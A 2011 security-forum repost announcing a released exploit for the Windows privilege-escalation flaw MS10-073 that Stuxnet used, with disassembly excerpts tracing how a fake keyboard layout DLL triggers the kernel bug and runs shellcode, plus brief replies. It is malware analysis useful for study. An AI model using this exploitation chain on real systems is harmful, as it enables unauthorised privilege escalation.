[转帖]Stuxnet MS10-073/CVE-2010-2743 Exploit-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[转帖]Stuxnet MS10-073/CVE-2010-2743 Exploit

2011-1-18 15:41 6171

[转帖]Stuxnet MS10-073/CVE-2010-2743 Exploit

spide

2011-1-18 15:41

6171

From: http://www.reversemode.com

o inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges in XP/2K boxes. It's stored in the resource 250, xored, can you guess the key? ;)

After performing several paranoid checks to avoid unsuccessful exploitation ( elaborated by VUPEN), the party starts...

The vulnerability has been already explained so just a couple of notes Resource250.dll

.text:10001082                test si, si
.text:10001085                jnz    short loc_100010A9
.text:10001087                push [ebp+var_4]
.text:1000108A                lea    eax, [ebp+var_44]
.text:1000108D                push eax
.text:1000108E                call GoGoGo

...
.text:10002A48                lea    eax, [ebp+var_218]
.text:10002A4E                push eax
.text:10002A4F                lea    eax, [ebp+var_8]
.text:10002A52                push eax
.text:10002A53                push edi
.text:10002A54                call CreateFakeKbdLayoutFile

Stuxnet creates a temporary file and writes into it a minimalistic fake Keyboard Layout dll built up to be swallowed by win32k!ReadLayoutFile without problems.
.text:10001FC6 loc_10001FC6:                         ; CODE XREF: CreateFakeKbdLayoutFile+CFj
.text:10001FC6                push ebx
.text:10001FC7                lea    eax, [ebp+var_4]
.text:10001FCA                push eax
.text:10001FCB                push 246h
.text:10001FD0                push offset unk_1000B058; fake Keyboard Layout Dll
.text:10001FD5                push esi
.text:10001FD6                call WriteFile
Then it is ready to trigger the vuln and execute the shellcode
.text:10002A63                push [ebp+var_8]
.text:10002A66                push edi
.text:10002A67                push esi
.text:10002A68                push [ebp+arg_0]
.text:10002A6B                push [ebp+var_4]
.text:10002A6E                call TriggerVuln
...
.text:100027F3                push 101h
.text:100027F8                push [ebp+var_8]
.text:100027FB                push eax
.text:100027FC                push [ebp+var_4]
.text:100027FF                push 1AE0160h
.text:10002804                push [ebp+arg_10]
.text:10002807                call LoadFakeKBDviaNtUserLoadKeyboardLayoutEx
Finally
.text:10002839                push 1Ch
.text:1000283B                lea    eax, [ebp+var_50]
.text:1000283E                push eax
.text:1000283F                push ebx
.text:10002840                mov    [edi+38h], esi
.text:10002843                call SendInput
At this point the shellcode is being executed. Everytime this code is executed God breaks something in Natanz.

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。

上传的附件：

ms10-073-stuxnet.zip （1.62kb，78次下载）

收藏・0

点赞・0

打赏

最新回复 (3)
webwizard 雪币： 29 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 310 粉丝 0 关注私信	webwizard 2011-1-19 03:38 2 楼 0 关注一下下。
spide 雪币： 33 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 36 粉丝 0 关注私信	spide 2011-1-19 12:10 3 楼 0 额，这个洞是大名鼎鼎的震网爆出来的Windows提权的0Day，没人关注？
chinahanwu 雪币： 1231 活跃值： (41) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 36 粉丝 0 关注私信	chinahanwu 2011-1-20 07:46 4 楼 0 有震网的样本或是分析报告吗？是个NB的东东啊。
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复